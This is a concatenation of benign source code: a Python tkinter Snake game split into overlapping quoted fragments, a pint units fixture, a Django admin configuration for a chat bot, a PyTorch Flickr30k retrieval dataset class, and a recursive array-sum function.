"keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): # creating segments and snake segments =",
"range(len(self.segments)-1): segment = self.segments[index].instance x1, y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1,",
"the snake with the specified vector\"\"\" for index in range(len(self.segments)-1): segment = self.segments[index].instance",
"global IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def",
"snake segment \"\"\" def __init__(self, x, y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE,",
"posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles game process \"\"\" global IN_GAME",
"def reset_snake(self): for segment in self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state) def",
"\"\"\" global BLOCK posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy =",
"c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple Snake class \"\"\" def",
"(HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\"",
"Check for collision with gamefield edges if x2 > WIDTH or x1 <",
"IN_GAME = False # Eating apples elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block()",
"Adds segment to the snake \"\"\" last_seg = c.coords(self.segments[0].instance) x = last_seg[2] -",
"Segment(object): \"\"\" Single snake segment \"\"\" def __init__(self, x, y): self.instance = c.create_rectangle(x,",
"the snake \"\"\" last_seg = c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE y =",
"segments # possible moves self.mapping = {\"Down\": (0, 1), \"Right\": (1, 0), \"Up\":",
"def move(self): \"\"\" Moves the snake with the specified vector\"\"\" for index in",
"in self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self): for segment in self.segments: c.delete(segment.instance) def",
"= 800 HEIGHT = 600 SEG_SIZE = 20 IN_GAME = True # Helper",
"# creating segments and snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)]",
"Segment(x, y)) def change_direction(self, event): \"\"\" Changes direction of snake \"\"\" if event.keysym",
"def create_block(): \"\"\" Creates an apple to be eaten \"\"\" global BLOCK posx",
"x1, y1, x2, y2) x1, y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE,",
"SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self, event): \"\"\" Changes direction of snake \"\"\"",
"self.vector = self.mapping[\"Right\"] def move(self): \"\"\" Moves the snake with the specified vector\"\"\"",
"with gamefield edges if x2 > WIDTH or x1 < 0 or y1",
"c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here to restart\", state='hidden') c.tag_bind(restart_text, \"<Button-1>\", clicked)",
"= c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2) x1, y1, x2, y2 = c.coords(self.segments[-2].instance)",
"y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment to the snake \"\"\" last_seg",
"= {\"Down\": (0, 1), \"Right\": (1, 0), \"Up\": (0, -1), \"Left\": (-1, 0)}",
"Changes direction of snake \"\"\" if event.keysym in self.mapping: self.vector = self.mapping[event.keysym] def",
"y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple Snake",
"main) # Not IN_GAME -> stop game and print message else: set_state(restart_text, 'normal')",
"or x1 < 0 or y1 < 0 or y2 > HEIGHT: IN_GAME",
"font='Arial 20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here",
"self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self): for segment in self.segments: c.delete(segment.instance) def set_state(item,",
"Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): # creating segments and snake",
"= self.mapping[\"Right\"] def move(self): \"\"\" Moves the snake with the specified vector\"\"\" for",
"Single snake segment \"\"\" def __init__(self, x, y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE,",
"c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial",
"restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here to restart\", state='hidden') c.tag_bind(restart_text,",
"\"\"\" Changes direction of snake \"\"\" if event.keysym in self.mapping: self.vector = self.mapping[event.keysym]",
"(WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK =",
"if event.keysym in self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self): for segment in self.segments:",
"return Snake(segments) # Setting up window root = Tk() root.title(\"PythonicWay Snake\") c =",
"IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1, x2, y2 = head_coords # Check",
"0), \"Up\": (0, -1), \"Left\": (-1, 0)} # initial movement direction self.vector =",
"main() def create_snake(): # creating segments and snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2,",
"s.add_segment() c.delete(BLOCK) create_block() # Self-eating else: for index in range(len(s.segments)-1): if head_coords ==",
"# Eating apples elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating else:",
"True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global s create_block() s",
"specified vector\"\"\" for index in range(len(self.segments)-1): segment = self.segments[index].instance x1, y1, x2, y2",
"SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\")",
"head_coords = c.coords(s.segments[-1].instance) x1, y1, x2, y2 = head_coords # Check for collision",
"random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main():",
"Creates an apple to be eaten \"\"\" global BLOCK posx = SEG_SIZE *",
"(1, 0), \"Up\": (0, -1), \"Left\": (-1, 0)} # initial movement direction self.vector",
"Tk() root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing",
"x2, y2 = head_coords # Check for collision with gamefield edges if x2",
"posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles game process \"\"\" global IN_GAME if IN_GAME:",
"last_seg[2] - SEG_SIZE y = last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self,",
"= last_seg[2] - SEG_SIZE y = last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y)) def",
"posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE,",
"= c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here to restart\", state='hidden') c.tag_bind(restart_text, \"<Button-1>\",",
"in range(len(self.segments)-1): segment = self.segments[index].instance x1, y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1,",
"__init__(self, x, y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\"",
"Helper functions def create_block(): \"\"\" Creates an apple to be eaten \"\"\" global",
"def __init__(self, x, y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object):",
"segment to the snake \"\"\" last_seg = c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE",
"__init__(self, segments): self.segments = segments # possible moves self.mapping = {\"Down\": (0, 1),",
"\"\"\" last_seg = c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE y = last_seg[3] -",
"keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden') restart_text",
"# initial movement direction self.vector = self.mapping[\"Right\"] def move(self): \"\"\" Moves the snake",
"reset_snake(self): for segment in self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state) def clicked(event):",
"set_state(item, state): c.itemconfigure(item, state=state) def clicked(event): global IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK)",
"# possible moves self.mapping = {\"Down\": (0, 1), \"Right\": (1, 0), \"Up\": (0,",
"clicked(event): global IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game()",
"self.segments[index].instance x1, y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2) x1,",
"self.vector = self.mapping[event.keysym] def reset_snake(self): for segment in self.segments: c.delete(segment.instance) def set_state(item, state):",
"state): c.itemconfigure(item, state=state) def clicked(event): global IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text,",
"def set_state(item, state): c.itemconfigure(item, state=state) def clicked(event): global IN_GAME s.reset_snake() IN_GAME = True",
"and print message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single snake",
"else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single snake segment \"\"\" def",
"and snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) #",
"= True # Helper functions def create_block(): \"\"\" Creates an apple to be",
"\"\"\" Creates an apple to be eaten \"\"\" global BLOCK posx = SEG_SIZE",
"process \"\"\" global IN_GAME if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1, x2,",
"create_block(): \"\"\" Creates an apple to be eaten \"\"\" global BLOCK posx =",
"Snake class \"\"\" def __init__(self, segments): self.segments = segments # possible moves self.mapping",
"x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds",
"/ SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles",
"\"\"\" Adds segment to the snake \"\"\" last_seg = c.coords(self.segments[0].instance) x = last_seg[2]",
"y2 > HEIGHT: IN_GAME = False # Eating apples elif head_coords == c.coords(BLOCK):",
"False root.after(100, main) # Not IN_GAME -> stop game and print message else:",
"head_coords # Check for collision with gamefield edges if x2 > WIDTH or",
"{\"Down\": (0, 1), \"Right\": (1, 0), \"Up\": (0, -1), \"Left\": (-1, 0)} #",
"y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\"",
"s.change_direction) main() def create_snake(): # creating segments and snake segments = [Segment(SEG_SIZE, SEG_SIZE),",
"False # Eating apples elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating",
"root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing c.focus_set()",
"elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating else: for index in",
"apples elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating else: for index",
"last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self, event): \"\"\" Changes direction of",
"c.itemconfigure(item, state=state) def clicked(event): global IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden')",
"if x2 > WIDTH or x1 < 0 or y1 < 0 or",
"segment \"\"\" def __init__(self, x, y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\")",
"import Tk, Canvas import random # Globals WIDTH = 800 HEIGHT = 600",
"IN_GAME -> stop game and print message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class",
"SEG_SIZE y = last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self, event): \"\"\"",
"\"\"\" def __init__(self, x, y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class",
"== c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main) # Not IN_GAME -> stop game",
"in self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state) def clicked(event): global IN_GAME s.reset_snake()",
"create_snake(): # creating segments and snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3,",
"# Self-eating else: for index in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME =",
"= Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2,",
"= True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global s create_block()",
"(-1, 0)} # initial movement direction self.vector = self.mapping[\"Right\"] def move(self): \"\"\" Moves",
"import random # Globals WIDTH = 800 HEIGHT = 600 SEG_SIZE = 20",
"x2 > WIDTH or x1 < 0 or y1 < 0 or y2",
"x2, y2) x1, y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE)",
"c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment to the",
"from tkinter import Tk, Canvas import random # Globals WIDTH = 800 HEIGHT",
"create_block() # Self-eating else: for index in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME",
"c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global s create_block() s = create_snake() # Reaction",
"if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1, x2, y2 = head_coords #",
"y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2) x1, y1, x2, y2 =",
"stop game and print message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\"",
"create_snake() # Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): # creating segments",
"= self.segments[index].instance x1, y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2)",
"c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden') restart_text =",
"edges if x2 > WIDTH or x1 < 0 or y1 < 0",
"c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating else: for index in range(len(s.segments)-1): if head_coords",
"create_block() s = create_snake() # Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake():",
"Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2,",
"message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single snake segment \"\"\"",
"if head_coords == c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main) # Not IN_GAME ->",
"global BLOCK posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE",
"c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing c.focus_set() game_over_text =",
"snake \"\"\" if event.keysym in self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self): for segment",
"last_seg = c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE y = last_seg[3] - SEG_SIZE",
"Eating apples elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating else: for",
"= c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles game process \"\"\"",
"0 or y1 < 0 or y2 > HEIGHT: IN_GAME = False #",
"# Not IN_GAME -> stop game and print message else: set_state(restart_text, 'normal') set_state(game_over_text,",
"Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing c.focus_set() game_over_text",
"> WIDTH or x1 < 0 or y1 < 0 or y2 >",
"Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting up window root = Tk() root.title(\"PythonicWay Snake\")",
"be eaten \"\"\" global BLOCK posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE)",
"\"Right\": (1, 0), \"Up\": (0, -1), \"Left\": (-1, 0)} # initial movement direction",
"window root = Tk() root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid()",
"collision with gamefield edges if x2 > WIDTH or x1 < 0 or",
"> HEIGHT: IN_GAME = False # Eating apples elif head_coords == c.coords(BLOCK): s.add_segment()",
"def clicked(event): global IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden')",
"on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): # creating segments and snake segments",
"* random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE)",
"Snake(segments) # Setting up window root = Tk() root.title(\"PythonicWay Snake\") c = Canvas(root,",
"# Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): # creating segments and",
"c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment to the snake",
"head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating else: for index in range(len(s.segments)-1):"
] |
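One detail worth calling out in the apple-placement code: under Python 3, random.randint rejects float bounds, so the arithmetic above uses floor division. A standalone sketch of the same grid-aligned placement follows; the helper name random_cell is illustrative and not part of the game above.

import random

SEG_SIZE = 20            # cell size in pixels, matching the game above
WIDTH, HEIGHT = 800, 600

def random_cell():
    """Pick the top-left corner of a random grid cell inside the field."""
    # Floor division keeps both randint bounds integral (Python 3 requirement).
    col = random.randint(1, (WIDTH - SEG_SIZE) // SEG_SIZE)
    row = random.randint(1, (HEIGHT - SEG_SIZE) // SEG_SIZE)
    return col * SEG_SIZE, row * SEG_SIZE

print(random_cell())     # e.g. (340, 160); both values are multiples of SEG_SIZE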
# botbot/apps/bots/admin.py
"""Django admin configuration for the bot objects. """
import redis

from django import forms
from django.conf import settings
from django.contrib import admin
from django.forms.models import BaseInlineFormSet

from . import models


class PluginFormset(BaseInlineFormSet):
    def __init__(self, *args, **kwargs):
        super(PluginFormset, self).__init__(*args, **kwargs)


class ActivePluginInline(admin.StackedInline):
    model = models.Channel.plugins.through
    formset = PluginFormset

    def get_extra(self, request, obj=None, **kwargs):
        return 0


class ChatBotAdmin(admin.ModelAdmin):
    exclude = ('connection', 'server_identifier')
    list_display = ('__unicode__', 'is_active', 'usage')
    list_editable = ('is_active',)
    list_filter = ('is_active',)
    readonly_fields = ('server_identifier',)

    # Disable bulk delete, because it doesn't call delete, so skips REFRESH
    actions = None

    def usage(self, obj):
        return "%d%%" % (
            (obj.channel_set.filter(status=models.Channel.ACTIVE).count() /
             float(obj.max_channels)) * 100)


def botbot_refresh(modeladmin, request, queryset):
    """ Ask daemon to reload configuration """
    queue = redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL)
    queue.lpush('bot', 'REFRESH')
botbot_refresh.short_description = "Reload botbot-bot configuration"


class ChannelForm(forms.ModelForm):
    class Meta:
        model = models.Channel
        exclude = []

    def clean_private_slug(self):
        return self.cleaned_data['private_slug'] or None


class ChannelAdmin(admin.ModelAdmin):
    form = ChannelForm
    list_display = ('name', 'chatbot', 'status', 'is_featured', 'created',
                    'updated')
    list_filter = ('status', 'is_featured', 'is_public', 'chatbot')
    prepopulated_fields = {
        'slug': ('name',)
    }
    list_editable = ('chatbot', 'status',)
    readonly_fields = ('fingerprint', 'created', 'updated')
    search_fields = ('name', 'chatbot__server')
    inlines = [ActivePluginInline]
    actions = [botbot_refresh]


class PublicChannelApproval(ChannelAdmin):
    def has_add_permission(self, request):
        return False

    def get_queryset(self, request):
        qs = super(PublicChannelApproval, self).get_queryset(request)
        return qs.filter(status=self.model.ACTIVE, is_public=True)


class PublicChannels(models.Channel):
    class Meta:
        proxy = True
        verbose_name = "Pending Public Channel"


admin.site.register(PublicChannels, PublicChannelApproval)
admin.site.register(models.ChatBot, ChatBotAdmin)
admin.site.register(models.Channel, ChannelAdmin)
admin.site.register(models.UserCount)
"return \"%d%%\" % ( (obj.channel_set.filter(status=models.Channel.ACTIVE).count() / float(obj.max_channels)) * 100) def botbot_refresh(modeladmin, request, queryset):",
"is_public=True) class PublicChannels(models.Channel): class Meta: proxy = True verbose_name = \"Pending Public Channel\"",
"Disable bulk delete, because it doesn't call delete, so skips REFRESH actions =",
"from django.forms.models import BaseInlineFormSet from . import models class PluginFormset(BaseInlineFormSet): def __init__(self, *args,",
"def get_extra(self, request, obj=None, **kwargs): return 0 class ChatBotAdmin(admin.ModelAdmin): exclude = ('connection', 'server_identifier')",
"Meta: model = models.Channel exclude = [] def clean_private_slug(self): return self.cleaned_data['private_slug'] or None",
"redis from django import forms from django.conf import settings from django.contrib import admin",
"django.forms.models import BaseInlineFormSet from . import models class PluginFormset(BaseInlineFormSet): def __init__(self, *args, **kwargs):",
"= ('connection', 'server_identifier') list_display = ('__unicode__', 'is_active', 'usage') list_editable = ('is_active',) list_filter =",
"models class PluginFormset(BaseInlineFormSet): def __init__(self, *args, **kwargs): super(PluginFormset, self).__init__(*args, **kwargs) class ActivePluginInline(admin.StackedInline): model",
"= [ActivePluginInline] actions = [botbot_refresh] class PublicChannelApproval(ChannelAdmin): def has_add_permission(self, request): return False def",
"return qs.filter(status=self.model.ACTIVE, is_public=True) class PublicChannels(models.Channel): class Meta: proxy = True verbose_name = \"Pending",
"\"%d%%\" % ( (obj.channel_set.filter(status=models.Channel.ACTIVE).count() / float(obj.max_channels)) * 100) def botbot_refresh(modeladmin, request, queryset): \"\"\"",
"daemon to reload configuration \"\"\" queue = redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL) queue.lpush('bot', 'REFRESH') botbot_refresh.short_description = \"Reload",
"= redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL) queue.lpush('bot', 'REFRESH') botbot_refresh.short_description = \"Reload botbot-bot configuration\" class ChannelForm(forms.ModelForm): class Meta:",
"'created', 'updated') search_fields = ('name', 'chatbot__server') inlines = [ActivePluginInline] actions = [botbot_refresh] class",
"super(PluginFormset, self).__init__(*args, **kwargs) class ActivePluginInline(admin.StackedInline): model = models.Channel.plugins.through formset = PluginFormset def get_extra(self,",
"= { 'slug': ('name',) } list_editable = ('chatbot','status',) readonly_fields = ('fingerprint', 'created', 'updated')",
"import admin from django.forms.models import BaseInlineFormSet from . import models class PluginFormset(BaseInlineFormSet): def"
] |
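The admin action above only pushes a 'REFRESH' marker onto a Redis list; the bot daemon is expected to pop it and reload. A minimal sketch of that consumer side, assuming redis-py; the loop and the reload_configuration callback are illustrative, not part of the file above:

import redis

def wait_for_refresh(redis_url, reload_configuration):
    """Block on the 'bot' list and invoke the callback on REFRESH markers."""
    queue = redis.from_url(redis_url)
    while True:
        # brpop blocks until an item arrives; returns (key, value) or None on timeout
        item = queue.brpop('bot', timeout=30)
        if item is not None and item[1] in (b'REFRESH', 'REFRESH'):
            reload_configuration()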
import pint
import pytest


@pytest.fixture(scope="session")
def ureg():
    """Application-wide units registry."""
    registry = pint.get_application_registry()

    # Used by .compat.ixmp, .compat.pyam
    registry.define("USD = [USD]")
    registry.define("case = [case]")

    yield registry
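Because the fixture is session-scoped, the USD and case definitions persist across the whole test run. A minimal sketch of a test that would consume it (the test name is illustrative):

def test_usd_units(ureg):
    # 3 USD + 4 USD should combine like any other pint quantity
    total = ureg.Quantity(3, "USD") + ureg.Quantity(4, "USD")
    assert total.magnitude == 7
    assert str(total.units) == "USD"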
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import jsonlines
import torch
import random
import numpy as np
import _pickle as cPickle


class Flickr30kRetrievalDatabase(torch.utils.data.Dataset):
    def __init__(self, imdb_path, dataset_type, test_id_file_path, hard_neg_file_path):
        super().__init__()
        self._dataset_type = dataset_type
        self._load_annotations(imdb_path, test_id_file_path, hard_neg_file_path)
        self._metadata = {}

    @property
    def metadata(self):
        return self._metadata

    @metadata.setter
    def metadata(self, x):
        self._metadata = x

    def _load_annotations(self, imdb_path, test_id_path, hard_neg_file_path):
        if self._dataset_type != "train":
            self.imgs = []

        with jsonlines.open(imdb_path) as reader:
            # Build an index which maps image id with a list of caption annotations.
            entries = []
            imgid2entry = {}
            count = 0
            remove_ids = []

            if test_id_path:
                remove_ids = np.load(test_id_path)
                remove_ids = [int(x) for x in remove_ids]

            for annotation in reader:
                image_id = int(annotation["img_path"].split(".")[0])
                if self._dataset_type != "train":
                    self.imgs.append(image_id)
                if self._dataset_type == "train" and int(image_id) in remove_ids:
                    continue
                imgid2entry[image_id] = []
                for sentences in annotation["sentences"]:
                    entries.append({"caption": sentences, "image_id": image_id})
                    imgid2entry[image_id].append(count)
                    count += 1

        self._entries = entries
        self.imgid2entry = imgid2entry
        self.image_id_list = [*self.imgid2entry]

        if self._dataset_type == "train":
            with open(hard_neg_file_path, "rb") as f:
                image_info = cPickle.load(f)
            for key, value in image_info.items():
                setattr(self, key, value)
            self.train_imgId2pool = {
                imageId: i for i, imageId in enumerate(self.train_image_list)
            }

        self.db_size = len(self._entries)

    def __len__(self):
        return self.db_size

    def __getitem__(self, idx):
        entry = self._entries[idx]
        if self._dataset_type != "train":
            return entry, self.imgs

        image_id = entry["image_id"]
        while True:
            # sample a random image:
            img_id2 = random.choice(self.image_id_list)
            if img_id2 != image_id:
                break
        entry2 = self._entries[random.choice(self.imgid2entry[img_id2])]

        # random image wrong
        while True:
            # sample a random image:
            img_id3 = random.choice(self.image_id_list)
            if img_id3 != image_id:
                break
        entry3 = self._entries[self.imgid2entry[img_id3][0]]

        if self._dataset_type == "train":
            # random hard caption.
            rand_img_id_pool = self.train_hard_pool[self.train_imgId2pool[image_id]]
            pool_img_idx = int(
                rand_img_id_pool[np.random.randint(1, len(rand_img_id_pool))]
            )
            img_id4 = self.train_image_list[pool_img_idx]
        else:
            while True:
                # sample a random image:
                img_id4 = random.choice(self.image_id_list)
                if img_id4 != image_id:
                    break
        entry4 = self._entries[random.choice(self.imgid2entry[img_id4])]

        return [entry, entry2, entry3, entry4]
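Each training item therefore bundles the anchor entry with three distractors: a caption from a random other image, the first caption of a second random image, and a hard negative drawn from a precomputed pool. The rejection loop that guarantees a sampled id differs from the anchor can be isolated into a helper; a minimal standalone sketch (sample_other_id is an illustrative name, not part of the class above):

import random

def sample_other_id(id_list, anchor_id):
    """Rejection-sample an id from id_list that differs from anchor_id."""
    while True:
        candidate = random.choice(id_list)
        if candidate != anchor_id:
            return candidate

# e.g. sample_other_id([10, 11, 12], 10) always returns 11 or 12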
<filename>Algorithms/Divide-and-Conquer/Python/main.py
from typing import List


def arraysum(array: List[int]) -> int:
    """
    Get the sum of all the elements in the array.

    arraysum
    ========
    The `arraysum` function takes an array and returns the sum of all of
    its elements using the divide and conquer method.

    Parameters
    ----------
    array: List[int]
        An array/list of integers

    Returns
    -------
    sum: int
        Sum of all the elements in the array
    """
    if len(array) == 0:  # The base case: if the length of the
        return 0         # array is 0 then stop
    return array.pop() + arraysum(array)  # Divide and conquer: divide the array
                                          # into first element and rest of the
                                          # elements and call itself with them


if __name__ == '__main__':
    print(f"{arraysum([1, 2, 3, 4, 5, 6, 7]) = }")
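Note that this version mutates its argument via pop() and recurses once per remaining element, so the split is one-vs-rest and the recursion depth is linear in the input size. A halving variant keeps the input intact and the depth logarithmic; a minimal sketch (arraysum_dc is an illustrative name, not from the file above):

from typing import List

def arraysum_dc(array: List[int]) -> int:
    """Sum by splitting the array in half and summing each half recursively."""
    if not array:
        return 0
    if len(array) == 1:
        return array[0]
    mid = len(array) // 2
    return arraysum_dc(array[:mid]) + arraysum_dc(array[mid:])

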